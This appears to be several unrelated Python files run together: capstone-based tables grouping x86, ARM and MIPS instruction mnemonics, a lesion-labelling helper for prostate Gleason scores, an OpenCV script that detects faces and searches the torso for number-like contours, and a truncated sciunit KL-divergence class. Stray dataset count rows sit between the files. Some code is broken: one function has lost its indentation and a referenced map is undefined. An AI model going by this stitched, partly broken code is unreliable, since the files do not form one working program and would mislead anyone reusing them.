"CMPXCHG",
"CMPXCHG8B",
# from bit
"TEST",
# from string
"CMPS",
"CMPSB",
"CMPSD",
"CMPSW",
# MMX
"PCMPEQB",
"PCMPEQW",
"PCMPEQD",
"PCMPGTB",
"PCMPGTW",
"PCMPGTD",
# SSE4
"PHMINPOSUW",
"PTEST",
"PCMPEQQ",
# SSE4.2
"PCMPESTRI",
"PCMPESTRM",
"PCMPISTRI",
"PCMPISTRM",
"PCMPGTQ",
# Vector
"VPTEST",
]
# Shift and Rotate Instructions:
X86_GRP_SHIFT = [
# general purpose instructions
"SAR",
"SHR",
"SAL",
"SHL",
"SHRD",
"SHLD",
"ROR",
"ROL",
"RCR",
"RCL",
# BMI1, BMI2
"RORX",
"SARX",
"SHLX",
"SHRX",
# MMX
"PSLLW",
"PSLLD",
"PSLLQ",
"PSRLW",
"PSRLD",
"PSRLQ",
"PSRAW",
"PSRAD",
# SSE2 128-bit integer
"PSLLDQ",
"PSRLDQ",
# vector
"VPROL",
"VPROR",
"VPSRA",
"VPSLL",
"VPSRA",
]
# Logical Instructions:
X86_GRP_LOGIC = [
# general purpose instructions
"AND",
"NOT",
"OR",
"XOR",
# BMI1, BMI2
"ANDN",
# MMX
"PAND",
"PANDN",
"POR",
"PXOR",
# SSE
"ANDPS",
"ANDNPS",
"ORPS",
"XORPS",
# SSE2
"ANDPD",
"ANDNPD",
"ORPD",
"XORPD",
# Vector
"VPTERLOG",
]
# bit and byte instructions:
X86_GRP_BIT = [
# general purpose instructions
"SETA",
"SETAE",
"SETB",
"SETBE",
"SETC",
"SETE",
"SETG",
"SETGE",
"SETL",
"SETLE",
"SETNA",
"SETNAE",
"SETNB",
"SETNBE",
"SETNC",
"SETNE",
"SETNG",
"SETNGE",
"SETNL",
"SETNLE",
"SETNO",
"SETNP",
"SETNS",
"SETNZ",
"SETO",
"SETP",
"SETPE",
"SETPO",
"SETS",
"SETZ",
"TEST",
"CRC32",
# BMI1, BMI2
"BLSMSK",
"BLSR",
"CLAC",
"STAC",
# from bit
"TEST",
"BT",
"BTS",
"BTR",
"BTC",
"BSF",
"BSR",
"POPCNT",
"TZCNT",
"LZCNT",
]
# control transfer instructions:
X86_GRP_CTRANSFER = [
# general purpose instructions
"JMP",
"CALL",
"RET",
"IRET",
"INT",
"INTO",
"BOUND",
"ENTER",
"LEAVE",
# flag
"CLI",
"STI",
# SSE2
"PAUSE",
# SSE3
"MONITOR",
"MWAIT",
"XABORT",
"XACQUIRE",
"XRELEASE",
"XBEGIN",
"XEND",
"XTEST",
"HLT",
"SYSCALL",
"SYSENTER",
"SYSEXIT",
"SYSRET",
"FWAIT",
"WAIT",
# vm related instructions
"VMCALL",
"VMLAUNCH",
"VMMCALL",
"VMRESUME",
"VMRUN",
"VMFUNC",
"VMCLEAR",
"VMXON",
"VMXOFF",
]
X86_GRP_COND_CTRANSFER = [
# general purpose instructions
"JA",
"JAE",
"JB",
"JBE",
"JC",
"JCXZ",
"JE",
"JECXZ",
"JRCXZ",
"JG",
"JGE",
"JL",
"JLE",
"JNAE",
"JNB",
"JNBE",
"JNC",
"JNE",
"JNG",
"JNGE",
"JNL",
"JNLE",
"JNO",
"JNP",
"JNS",
"JNZ",
"JO",
"JP",
"JPE",
"JPO",
"JS",
"JZ",
"LOOP",
"LOOPE",
"LOOPNE",
"LOOPNZ",
"LOOPZ",
# string
"REP",
"REP MOVSQ",
"REP STOSQ",
"REPNE",
"REPNZ",
"REPE",
"REPZ",
]
# ==================== ARM 32 =============================================
ARM_GRP_DTRANSFER = [
# general purpose instructions
"LDA",
"ADR",
"ADRP",
"LDR",
"LDRD",
"LDRB",
"LDRBT",
"LDRH",
"LDRS",
"LDRSB",
"LDRSBT",
"LDRSH",
"LDRSHT",
"LDRT",
"LDRHT",
"STR",
"STRB",
"STRD",
"STRH",
"STRBT",
"STRT",
"LDM",
"LDMDA",
"LDMDB",
"LDMIB",
"STM",
"STMDA",
"STMDB",
"STMIB",
"PLD",
"SWP",
"MOV",
"MOVI",
"MOVK",
"MOVZ",
"MOVT",
"MOVN",
"MVN",
"MVNI",
"STP",
"LDP",
"RFEIB",
# coprocessor data operations
"CDP",
"MCR",
"MCRR",
"MRC",
"MRR",
"LDC",
"LDCL",
"STC",
"STCL",
"PUSH",
"SBFX",
"SBFIZ",
"BFX",
"BFXIL",
"UBFX",
"UBFIZ",
"VLD",
"VST",
"VST2",
"VSTMDB",
"VTBL",
"VTBX",
"ZIP",
"ZIP1",
"ZIP2",
"UZP",
"UZP1",
"UZP2",
"XTN",
"XTN2",
"CSEL",
"LD1",
"LD2",
"LD4",
"ST1",
"ST2",
"ST4",
"LDPSW",
"LDRSW",
"SXTAB",
"SXTB",
"SXTH",
"SXTW",
"EXT",
"EXTR",
"INS",
"UXTAB",
"UXTB",
"UXTH",
"UXTW",
"BFC",
"BFI",
"BIC",
"CLZ",
"REV",
"REV16",
"REV32",
"REV64",
"CSET",
]
ARM_GRP_FLOAT_DTRANSFER = [
# floating point data transfer instructions
"FCPY",
"FCVTMS",
"FCVTMU",
"FCVTZS",
"FCVTZU",
"FCVT",
"FLD",
"FST",
"FMR",
"FMD",
"FMS",
"FMX",
"FSITO",
"FUITO",
"FTOSI",
"FTOUI",
"FMOV",
"UMOV",
"LDUR",
"LDURB",
"LDURH",
"LDURSB",
"LDURSH",
"LDURSW",
"STUR",
"STURB",
"STURH",
"STURSB",
"STURSH",
"STURSW",
"DUP",
"SCVTF",
"UCVTF",
]
ARM_GRP_MISC = [
"UDF",
"NOP",
"MRS",
"MSR",
"MAR",
"MRA",
"VMRS",
"VMSR",
"DBG",
"DMB",
"DSB",
"ISB",
"SETEND",
]
# binary arithmetic instructions:
ARM_GRP_ARITH = [
# general purpose instructions
"ADD",
"ADDW",
"ADDP",
"ADDV",
"ADC",
"SUB",
"SBC",
"RSB",
"RSC",
"CMN",
"CLZ",
"MUL",
"MLA",
"MLS",
"CINC",
"CINV",
"NEG",
"NEGS",
"DIV",
"SMAX",
"SMAXV",
"SMIN",
"SMINV",
"UMULL",
"UMLAL",
"UMLAL2",
"SMLA",
"SMLAL",
"SMLALTT",
"SMUL",
"SMSUB",
"MADD",
"MNEG",
"MSUB",
"SMADDL",
"SMNEGL",
"SMSUBL",
"SMULH",
"SMULL",
"UMADDL",
"UMNEGL",
"UMSUBL",
"UMULH",
"UMULL",
"SDIV",
"UDIV",
"MIA",
"QADD",
"QSUB",
"QDADD",
"QDSUB",
"QASX",
"SADD",
"SADDW",
"SADDW2",
"SASX",
"SHADD",
"SHASX",
"SMLSD",
"SMMLA",
"SMUAD",
"SMUSD",
"SSUB",
"SAT",
"SAX",
"UADD",
"UADDW",
"UADDW2",
"USAT",
"USAX",
"UASX",
"UHADD",
"UHASX",
"UMLSD",
"UMMLA",
"UQADD",
"UQSAX",
"UQSUB",
"UHSAX",
"VABA",
"VABD",
"MAX",
"MIN",
"VMLA",
"VMLS",
"VNMUL",
"VNMLA",
"VNMLS",
"VFMS",
"VFMS",
"VFMA",
"VFMS",
"VFNMA",
"VFNMS",
"VRECPE",
"VSQRT",
"VQRSH",
"UMULL",
"UMAAL",
"UMLAL",
"USADA8",
"VNEG",
"CNEG",
"CSINC",
"CSINV",
"CSNEG",
]
ARM_GRP_FLOAT_ARITH = [
# floating point arithmetic instructions
"FABS",
"FABD",
"FADD",
"FSUB",
"FDIV",
"FMUL",
"FNMUL",
"FSQRT",
"FMAC",
"FNMAC",
"FMSC",
"FNMSC",
"FNEG",
"FMADD",
"FMSUB",
"FNMADD",
"FNMSUB",
"FPINT",
"FCSEL",
"FMAX",
"FMIN",
"FMLA",
"FMLS",
"FRINTM",
"FRINTP",
"FRINT",
]
ARM_GRP_SHIFT = [
# shift operations
"ASR",
"LSL",
"LSR",
"ROR",
"RRX",
"PKHBT",
"PKHTB",
"SHL",
"USHL",
"USHLL",
"USHLL2",
"USHR",
"USRA",
"SSHL",
"SSHLL",
"SSHLL2",
"SSHR",
]
ARM_GRP_CMP = [
# compare instructions
"CMEQ",
"CMGT",
"CMHI",
"CMHS",
"CMP",
"CCMN",
"CCMP",
"VCEQ",
"VCGE",
"VCGT",
"VCLE",
"VCLT",
# from bit
"TST",
"TEQ",
]
ARM_GRP_FLOAT_CMP = [
"VCMP",
"VCMPE",
"FCMPE",
"FCMGT",
"FCM",
"FCMP",
"FCCMP",
"VCM",
]
# Logical Instructions:
ARM_GRP_LOGIC = [
"AND",
"ORR",
"EOR",
"EON",
"ORN",
]
# bit and byte instructions:
ARM_GRP_BIT = [
"TST",
"TEQ",
"BSL",
"BIF",
"BIT",
"BFC",
"BFI",
"BIC",
"CLZ",
"RBIT",
"REV",
"REV16",
"REV32",
"REV64",
"CSET",
]
# control transfer instructions:
ARM_GRP_CTRANSFER = [
"B",
"BR",
"BL",
"BLR",
"BX",
"BLX",
"BXJ",
"BAL",
"BLAL",
"BXAL",
"BLXAL",
"BXJAL",
"SWI",
"BKPT",
"RET",
"YIELD",
"WFE",
"WFI",
"SEV",
"SEVL",
"CPS",
"BRK",
"HLT",
"SVC",
"HVC",
"SMC",
"TRAP",
"ERET",
# ARM POP is return
"POP",
]
ARM_GRP_COND_CTRANSFER = [
"BEQ",
"BNE",
"BCS",
"BCC",
"BMI",
"BPL",
"BVS",
"BVC",
"BHI",
"BLS",
"BGE",
"BLT",
"BGT",
"BLE",
"BLEQ",
"BLNE",
"BLCS",
"BLCC",
"BLMI",
"BLPL",
"BLVS",
"BLVC",
"BLHI",
"BLLS",
"BLGE",
"BLLT",
"BLGT",
"BLLE",
"BXEQ",
"BXNE",
"BXCS",
"BXCC",
"BXMI",
"BXPL",
"BXVS",
"BXVC",
"BXHI",
"BXLS",
"BXGE",
"BXLT",
"BXGT",
"BXLE",
"BLXEQ",
"BLXNE",
"BLXCS",
"BLXCC",
"BLXMI",
"BLXPL",
"BLXVS",
"BLXVC",
"BLXHI",
"BLXLS",
"BLXGE",
"BLXLT",
"BLXGT",
"BLXLE",
"BXJEQ",
"BXJNE",
"BXJCS",
"BXJCC",
"BXJMI",
"BXJPL",
"BXJVS",
"BXJVC",
"BXJHI",
"BXJLS",
"BXJGE",
"BXJLT",
"BXJGT",
"BXJLE",
"TBZ",
"TBNZ",
# combined instructions
"CBZ",
"CBNZ",
]
# ==================== MIPS 32 =============================================
# data transfer
# reference : https://www.cs.cornell.edu/courses/cs3410/2008fa/MIPS_Vol2.pdf
# NOTE: "PREF" and "SYNC" appear twice; the duplication is preserved from the
# original table (matching only tests membership, so it is harmless).
MIPS_GRP_DTRANSFER = [
    "LB", "LBU", "LH", "LHU", "LL", "LW", "LWU", "LD", "LDL", "LDR",
    "LWL", "LWR", "PREF", "SB", "SC", "SD", "SDL", "SDR", "SH", "ST",
    "SW", "SWL", "SWR", "SYNC", "LUI",
    "LDXC1", "LWXC1", "SDXC1", "SWXC1",
    "MFHI", "MFLO", "MOV", "MOVF", "MOVN", "MOVT", "MOVZ", "MTHI",
    "MTLO", "MOVE", "CVT", "LDC", "LWC", "SDC", "SWC",
    # move
    "CFC", "CTC", "MFC", "MTC", "PREF", "SYNC", "SPLAT", "CFCMSA",
    "CTCMSA", "COPY", "PUSH", "SEH", "SEB", "WSBH", "DSBH", "DSHD",
    "MTC0", "MFC0", "LDC3", "LWC3", "SDC3", "SWC3",
    # coprocessor load, store
    "COP2", "LDC2", "LWC2", "SDC2", "SWC2",
    # cop move
    "CFC2", "CTC2", "MFC2", "MTC2",
]
MIPS_GRP_FLOAT_DTRANSFER = [
    # floating point
    "FRINT", "FCLASS",
    # load, store, memory
    "LDC1", "LWC1", "SDC1", "SWC1",
    # move
    "CFC1", "CTC1", "MFC1", "FMOV", "MOVF", "MOVN", "MOVT", "MOVZ", "MTC1",
    # convert
    "FEX", "FFINT", "FFQ", "FTINT", "FTRUN", "FTQ", "FCVT", "FLOOR",
    "ROUND", "TRUNC", "FFLOOR", "FROUND", "FTRUNC",
    "DMFC", "DMFC1", "DMTC", "DMTC1", "MTHC1", "MFHC1",
]
# binary arithmetic instructions:
# NOTE: "MADD"/"MSUB" appear twice; duplication preserved from the original.
MIPS_GRP_ARITH = [
    # general purpose instructions
    "ADD", "ADDI", "ADDU", "ADDIU", "SUB", "SUBU", "MUL", "MULT",
    "MULTU", "CLO", "CLZ", "DIV", "DIVU", "MADD", "MADDU", "MSUB",
    "MSUBU", "AADD", "ASUB", "ABS", "NEG", "NEGU",
    # additional
    "DAA", "DSUB", "DSUBU", "DSUBIU", "DDIV", "DDIVU", "DDIVIU",
    "DMUL", "DMULT", "DMULTU", "DOTP", "DPADD", "DPSUB", "MADD",
    "MAX", "MIN", "MSUB", "MOD", "SAT", "HSUB", "SQRT", "AUI",
    "DAUI", "DAHI", "DATI", "ADDIUPC", "AUIPC", "ALUIPC", "DADD",
    "DADDU", "DADDIU", "DCLZ",
    # from bit
    "BMZ", "BMN", "BNEG",
]
MIPS_GRP_CMP = [
    "SLT", "SLTI", "SLTIU", "SLTU",
    # compare instructions
    # NOTE: the following 20-mnemonic run appears twice in the original
    # table; the duplication is preserved as-is.
    "CMP", "CEQ", "CLE", "CLT", "CF", "CUN", "CEQ", "CUEQ", "COLT",
    "CULT", "COLE", "CULE", "CSF", "CNGLE", "CSEQ", "CNGL", "CLT",
    "CNGE", "CLE", "CNGT",
    "CMP", "CEQ", "CLE", "CLT", "CF", "CUN", "CEQ", "CUEQ", "COLT",
    "CULT", "COLE", "CULE", "CSF", "CNGLE", "CSEQ", "CNGL", "CLT",
    "CNGE", "CLE", "CNGT",
    "C",
]
MIPS_GRP_FLOAT_CMP = [
    # floating point compare instructions
    "FACF", "FC", "FS",
]
MIPS_GRP_SHIFT = [
    # shift operation
    "SLL", "SLLV", "SRL", "SRLV", "SRA", "SRAV", "SHL", "SHR", "SLD",
    "DSLL", "DSLL32", "DSLLV", "DSRA", "DSRA32", "DSRAV", "DSRL",
    "DSRL32", "DSRLV", "ROTR", "ROTRV", "DROTR", "DROTR32", "DROTRV",
    "LSA", "DLSA",
]
MIPS_GRP_FLOAT_ARITH = [
    # floating point
    "FABS", "FADD", "FDIV", "FMADD", "FMSUB", "FMUL", "FNEG",
    "FNMADD", "FNMSUB", "FEXP", "FLOG", "FMAX", "FMIN", "FRCP",
    "RECIP", "FRECIP", "FRSQRT", "FSQRT", "FSUB",
]
# Logical Instructions:
MIPS_GRP_LOGIC = ["AND", "ANDI", "NOR", "OR", "NOT", "ORI", "XOR", "XORI"]
# bit and byte instructions:
MIPS_GRP_BIT = [
    "BINS", "DINS", "DEXT", "EXT", "INS", "BMZ", "BMN", "BNEG",
    "BSEL", "BSET", "BCLR",
    # bit wise count
    "NLOC", "NLZC", "PCNT",
]
# Miscellaneous / system maintenance mnemonics.
MIPS_GRP_MISC = ["NOP", "SSNOP", "CACHE", "TLBP", "TLBR", "TLBWI", "TLBWR"]
# control transfer instructions:
MIPS_GRP_CTRANSFER = [
    "B", "BAL", "J", "JAL", "JR", "JALR", "BREAK", "SYSCALL",
    "PAUSE", "WAIT", "HLT", "ERET", "DERET", "SDBBP", "BKPT", "RET",
    "MFC0", "MTC0",
    # MIPS POP is return
    "POP",
    # float
    "BC1", "BC1F", "BC1T", "BC1FL", "BC1TL",
    # cop
    "BC2F", "BC2T", "BC2FL", "BC2TL", "BC3F", "BC3T", "BC3FL", "BC3TL",
]
# Conditional branches and trap instructions.
# NOTE: "BNEL" appears twice; duplication preserved from the original.
MIPS_GRP_COND_CTRANSFER = [
    "BEQ", "BEQZ", "BNE", "BGE", "BGEZ", "BGEZAL", "BGTZ", "BLEZ",
    "BLTZ", "BLTZAL", "BNEL", "BNEZ", "BNZ",
    "TEQ", "TEQI", "TGE", "TGEI", "TGEIU", "TGEU", "TLT", "TLTI",
    "TLTIU", "TLTU", "TNE", "TNEI",
    "BEQL", "BGEZALL", "BGEZL", "BGTZL", "BLEZL", "BLTZALL", "BLTZL",
    "BNEL",
]
# ============================================
# Below part creates dictionary which groups instructions
# Maps group number (see GRP_NO_MAP below) -> list of x86 mnemonics.
# Groups 9-13 are coarse "abstract" groups built by concatenating the
# concrete groups 20-28; 30 is the catch-all "unknown" group.
X86_GRP_MAP = {
    9: X86_GRP_FLOAT_DTRANSFER + X86_GRP_FLOAT_CMP + X86_GRP_FLOAT_ARITH,
    10: X86_GRP_MISC + X86_GRP_FLOAT_DTRANSFER + X86_GRP_DTRANSFER,
    11: X86_GRP_FLOAT_ARITH + X86_GRP_SHIFT + X86_GRP_ARITH,
    12: X86_GRP_LOGIC,
    13: X86_GRP_COND_CTRANSFER + X86_GRP_CTRANSFER,
    20: X86_GRP_FLOAT_DTRANSFER + X86_GRP_DTRANSFER,
    21: X86_GRP_FLOAT_ARITH + X86_GRP_ARITH,
    22: X86_GRP_FLOAT_CMP + X86_GRP_CMP,
    23: X86_GRP_SHIFT,
    24: X86_GRP_BIT,
    26: X86_GRP_COND_CTRANSFER,
    27: X86_GRP_CTRANSFER,
    28: X86_GRP_MISC,
    30: [],  # unknown
}
# Same group layout as X86_GRP_MAP, built from the ARM mnemonic tables above.
ARM_GRP_MAP = {
    9: ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_FLOAT_CMP + ARM_GRP_FLOAT_ARITH,
    10: ARM_GRP_MISC + ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_DTRANSFER,
    11: ARM_GRP_FLOAT_ARITH + ARM_GRP_SHIFT + ARM_GRP_ARITH,
    12: ARM_GRP_LOGIC,
    13: ARM_GRP_COND_CTRANSFER + ARM_GRP_CTRANSFER,
    20: ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_DTRANSFER,
    21: ARM_GRP_FLOAT_ARITH + ARM_GRP_ARITH,
    22: ARM_GRP_FLOAT_CMP + ARM_GRP_CMP,
    23: ARM_GRP_SHIFT,
    24: ARM_GRP_BIT,
    26: ARM_GRP_COND_CTRANSFER,
    27: ARM_GRP_CTRANSFER,
    28: ARM_GRP_MISC,
    30: [],  # unknown
}
# A64 does not allow instructions to be conditionally executed as ARM.
def _copy_for_arm64():
    """Return an independent copy of ARM_GRP_MAP for AArch64.

    The map's values are flat lists of mnemonic strings, so copying each
    list is sufficient — a full ``copy.deepcopy`` (and its local import)
    is unnecessary.
    """
    return {group_no: list(insts) for group_no, insts in ARM_GRP_MAP.items()}


ARM64_GRP_MAP = _copy_for_arm64()
# ARM instructions may have conditional suffix. Thus, initialize here. However,
# reference : http://infocenter.arm.com/help/index.jsp
ARM_COND_GROUPS = [9, 10, 11, 13, 20, 21, 22, 26]
# All ARM condition-code suffixes, including the aliases HS/LO and AL.
ARM_GRP_COND_CODE = [
    "EQ", "NE", "CS", "HS", "CC", "LO", "MI", "PL", "VS", "VC",
    "HI", "LS", "GE", "LT", "GT", "LE", "AL",
]
# for group_no in ARM_COND_GROUPS:
#     for inst in ARM_GRP_MAP[group_no]:
#         for cond in ARM_GRP_COND_CODE:
#             ARM_GRP_MAP[group_no].append(inst + cond)
# Same group layout as X86_GRP_MAP, built from the MIPS mnemonic tables above.
MIPS_GRP_MAP = {
    9: MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_FLOAT_CMP + MIPS_GRP_FLOAT_ARITH,
    10: MIPS_GRP_MISC + MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_DTRANSFER,
    11: MIPS_GRP_FLOAT_ARITH + MIPS_GRP_SHIFT + MIPS_GRP_ARITH,
    12: MIPS_GRP_LOGIC,
    13: MIPS_GRP_COND_CTRANSFER + MIPS_GRP_CTRANSFER,
    20: MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_DTRANSFER,
    21: MIPS_GRP_FLOAT_ARITH + MIPS_GRP_ARITH,
    # mips usually contains compare in conditional branch
    22: MIPS_GRP_FLOAT_CMP + MIPS_GRP_CMP + MIPS_GRP_COND_CTRANSFER,
    23: MIPS_GRP_SHIFT,
    24: MIPS_GRP_BIT,
    26: MIPS_GRP_COND_CTRANSFER,
    27: MIPS_GRP_CTRANSFER,
    28: MIPS_GRP_MISC,
    30: [],  # unknown
}
# ============================================
# Group number -> human-readable group name.
GRP_NO_MAP = {
    # Among capstone's default mapping, use 1, 2, 3 as they are common in all
    # architectures.
    1: "grp_jump",
    2: "grp_call",
    3: "grp_ret",
    # 9-13: abstract (coarse) groups.
    9: "floatinst",
    10: "abs_dtransfer",
    11: "abs_arith",
    12: "logic",
    13: "abs_ctransfer",
    # 20-28: concrete groups.
    20: "dtransfer",
    21: "arith",
    22: "cmp",
    23: "shift",
    24: "bitflag",
    26: "cndctransfer",
    27: "ctransfer",
    28: "misc",
    30: "unknown",
}
# Reverse lookup: group name -> group number.
GRP_NAME_MAP = {val: key for key, val in GRP_NO_MAP.items()}
# ============================================
# Below part maps capstone's internal instruction numbers to pre-defined groups
def _check_inst(target_inst, check_list, suffixes=[]):
target_inst = target_inst.split("_")[0]
target_inst = target_inst.split(".")[0]
target_inst = target_inst.upper()
for inst in check_list:
if target_inst == inst:
return True
# Check conditional code
if target_inst.startswith(inst):
if len(target_inst) - len(inst) == 2:
for suffix in suffixes:
if target_inst == inst + suffix:
return True
return False
def _init_inst_groups(prefix, target, groups):
    """Build {capstone instruction id: [group numbers]} for one architecture.

    Scans *target* (a capstone architecture module) for attributes starting
    with *prefix*, strips the prefix to obtain the mnemonic, and assigns it
    every matching group number from *groups*.  Unmatched instructions fall
    into the "unknown" group.
    """
    # ARM mnemonics may carry a two-letter conditional suffix.
    suffixes = ARM_GRP_COND_CODE if prefix == "ARM_INS_" else []
    inst_map = {}
    for attr in dir(target):
        if not attr.startswith(prefix):
            continue
        inst_no = getattr(target, attr)
        mnemonic = attr.replace(prefix, "")
        matched = [group_no for group_no, grouped_insts in groups.items()
                   if _check_inst(mnemonic, grouped_insts, suffixes)]
        inst_map[inst_no] = matched if matched else [GRP_NAME_MAP["unknown"]]
    return inst_map
def _init_groups():
    """Build the per-architecture instruction-id -> group tables.

    capstone is imported lazily here so the group tables above can be
    inspected without capstone installed.
    """
    import capstone
    x86 = _init_inst_groups("X86_INS_", capstone.x86, X86_GRP_MAP)
    arm = _init_inst_groups("ARM_INS_", capstone.arm, ARM_GRP_MAP)
    arm64 = _init_inst_groups("ARM64_INS_", capstone.arm64, ARM64_GRP_MAP)
    mips = _init_inst_groups("MIPS_INS_", capstone.mips, MIPS_GRP_MAP)
    # NOTE(review): PPC_GRP_MAP is defined elsewhere in this module.
    ppc = _init_inst_groups("PPC_INS_", capstone.ppc, PPC_GRP_MAP)
    return x86, arm, arm64, mips, ppc


# Materialized once at import time.
X86_INST_MAP, ARM_INST_MAP, ARM64_INST_MAP, MIPS_INST_MAP, PPC_INST_MAP = _init_groups()
| 28,253 | 14,455 |
"""Routines for handling patient lists."""
# TODO: Some functions from dwi.compat should be replaced with something better
# here, they're still used by tools/{roc_auc,correlation}.py.
from .types import GleasonScore
def label_lesions(patients, thresholds=None):
    """Label lesions according to score groups."""
    # Alternative: np.searchsorted(thresholds, [x.score for x in l])
    if thresholds is None:
        thresholds = GleasonScore.THRESHOLDS_STANDARD
    cutoffs = [GleasonScore(t) for t in thresholds]
    for patient in patients:
        for lesion in patient.lesions:
            # Label = number of cutoffs the lesion's score exceeds.
            lesion.label = sum(lesion.score > cutoff for cutoff in cutoffs)
def keep_scan(patients, i):
    """Discard other scans except index i. NOTE: Changes the structure."""
    for patient in patients:
        patient.scans = [patient.scans[i]]
| 814 | 267 |
def getUser():
    """Return the author credit string (name and blog URL)."""
    author = "Sanghak,Lee / http://sanghaklee.tistory.com"
    return author
import sys
import cv2
import os, os.path
import ColorClustering
import numpy as np
from PIL import Image
from pytesser import *
from sklearn.cluster import KMeans
from sklearn.externals import joblib
def find_most_Color(im, clusters):
    """Cluster the pixel colours of *im* (BGR) into *clusters* groups and
    return a colour bar ordered by cluster frequency."""
    # Convert to RGB and flatten to a (num_pixels, 3) sample matrix.
    pixels = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
    pixels = pixels.reshape((-1, 3))
    model = KMeans(n_clusters=clusters)
    model.fit(pixels)
    hist = ColorClustering.centroid_histogram(model)
    return ColorClustering.plot_colors(hist, model.cluster_centers_)
# Batch pipeline: for every image under image/, stamp its size, detect faces,
# crop an estimated torso region below each face, and search that region for
# similarly-coloured, aligned, digit-sized contours (e.g. a printed number).
# NOTE(review): `cv2.cv.*` constants and integer `/` division indicate
# Python 2 / OpenCV 2 — confirm the intended runtime.  Indentation was
# reconstructed from context — verify nesting against the original file.
for root, _, files in os.walk('image/'):
    for f in files:
        imagePath = os.path.join(root, f)
        # Skip temporary artifacts.
        if 'tmp' in imagePath: continue
        cascPath = 'haarcascade_frontalface_default.xml'
        faceCascade = cv2.CascadeClassifier(cascPath)
        image = cv2.imread(imagePath)
        imHeight, imWidth, channels = image.shape
        # Stamp the image dimensions near the top-left corner.
        cv2.putText(image, '%ix%i' %(imWidth,imHeight), (50, 50),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
        gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        faces = faceCascade.detectMultiScale(
            gray,
            scaleFactor=1.1,
            minNeighbors=5,
            minSize=(30, 30),
            flags=cv2.cv.CV_HAAR_SCALE_IMAGE
        )
        for facesCount, (fx, fy, fw, fh) in enumerate(faces):
            # Expected face height: ~1/10 of the larger image dimension.
            faceCom = imWidth/10 if imWidth>imHeight else imHeight/10
            # Discard detections deviating too far from the expected size.
            if faceCom - fh > 50 or faceCom - fh < -30: continue
            cv2.rectangle(image, (fx, fy), (fx + fh, fy + fh), (0, 255, 0), 2)
            cv2.putText(image, 'face: %i' %(facesCount), (fx, fy + fh),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
            cv2.putText(image, 'size: %i:%i' %(fw,fh), (fx, fy + fh -30),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
            cv2.putText(image, 's.comp: %i ' %(faceCom), (fx, fy + fh -60),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
            # Torso crop: 2-5 face-heights below the face, widened by a
            # third of the face width on each side (clamped at the left edge).
            bodyY = fy+(fh*2)
            bodyX1 = fx - fw / 3
            bodyX1 = 0 if bodyX1 < 0 else bodyX1
            imBody = image[fy + (fh*2):fy + (fh * 5), bodyX1:fx + fw + (fw / 3)]
            cv2.rectangle(image, (bodyX1, fy + (fh*2)), (fx + fw + (fw / 3), fy + (fh * 5)), (0, 255, 255), 2)
            gray = cv2.cvtColor(imBody, cv2.COLOR_BGR2GRAY)
            blur = cv2.GaussianBlur(gray, (9, 9), 0)
            thresh = cv2.adaptiveThreshold(blur, 255, 1, 1, 11, 2)
            contours, hierarchy = cv2.findContours(thresh, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
            dicBody = {}   # contour id -> (bbox array, 1st colour, last colour)
            dicTmp = {}    # current candidate group
            dicBest = {}   # largest group of similar, aligned contours so far
            for cntCount, cnt in enumerate(contours):
                [cx,cy,cw,ch] = cv2.boundingRect(cnt)
                # Keep only digit-sized contours relative to the face size.
                if cv2.contourArea(cnt) > 28 and (fh / 5) < ch < (fh / 2) and cw < (fw / 2) :
                    cv2.rectangle(imBody, (cx, cy), (cx + cw, cy + ch), (0, 0, 255), 2)
                    poin = np.array([cx,cy,cw,ch])
                    # Two dominant colours of the contour patch.
                    numBar = find_most_Color(imBody[cy:cy + ch, cx:cx + cw], 2)
                    dicBody[cntCount] = (poin,numBar[0][0],numBar[0][len(numBar[0]) - 1])
            for cont in dicBody:
                x = dicBody[cont][0][0]
                y = dicBody[cont][0][1]
                h = dicBody[cont][0][3]
                c1 = dicBody[cont][1]
                c2 = dicBody[cont][2]
                # Pick the colour with the larger first channel.
                clc1 = c1 if c1[0] > c2[0] else c2
                for c2Count, cont2 in enumerate(dicBody):
                    xl = dicBody[cont2][0][0]
                    yl = dicBody[cont2][0][1]
                    hl = dicBody[cont2][0][3]
                    cl1 = dicBody[cont2][1]
                    cl2 = dicBody[cont2][2]
                    clc2 = cl1 if cl1[0] > cl2[0] else cl2
                    clcl = int(clc1[0]) - int(clc2[0])
                    # Group contours roughly aligned vertically, close
                    # horizontally, of similar height and similar colour.
                    if yl - 10 < y < yl + 10 and xl - 200 < x < xl + 200 and hl - 5 < h < hl + 5 and abs(clcl) < 10:
                        dicTmp[c2Count] = dicBody[cont2]
                if len(dicTmp) > len(dicBest) and len(dicTmp) > 1:
                    dicBest = dicTmp
                dicTmp = {}
            # Bounding box of the best contour group.
            minX = 999999
            maxX = 0
            minY = 999999
            maxY = 0
            for rec in dicBest:
                [rx, ry, rw, rh] = dicBest[rec][0]
                if minX > rx:
                    minX = rx
                if minY > ry:
                    minY = ry
                if maxY < ry+rh:
                    maxY = ry+rh
                if maxX < rx+rw:
                    maxX = rx+rw
            if minX <999999 and maxX >0:
                # Crop the detected number region and outline it.
                imgNum = imBody[minY:maxY, minX:maxX]
                cv2.rectangle(imBody, (minX+2, minY+2), (maxX+2, maxY+2), (255, 0, 255), 2)
            # cv2.imshow(str(facesCount),imBody)
            # cv2.imshow('num'+str(facesCount),imgNum)
        # Show the annotated image at half size; 'w' advances to the next
        # image, 'q' quits the whole program.
        cv2.namedWindow("main", cv2.cv.CV_WINDOW_NORMAL)
        imageWinSize = cv2.resize(image, (imWidth/2, imHeight/2))
        while True:
            cv2.imshow("main", imageWinSize)
            key = cv2.waitKey(1) & 0xFF
            if key == ord("w"):
                break
            elif key == ord("q"):
                cv2.destroyAllWindows()
                sys.exit()
import numpy as np
from scipy.stats import entropy
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import seaborn as sns
import sciunit
class kl_divergence(sciunit.Score):
    """
    Kullback-Leibler Divergence D_KL(P||Q)
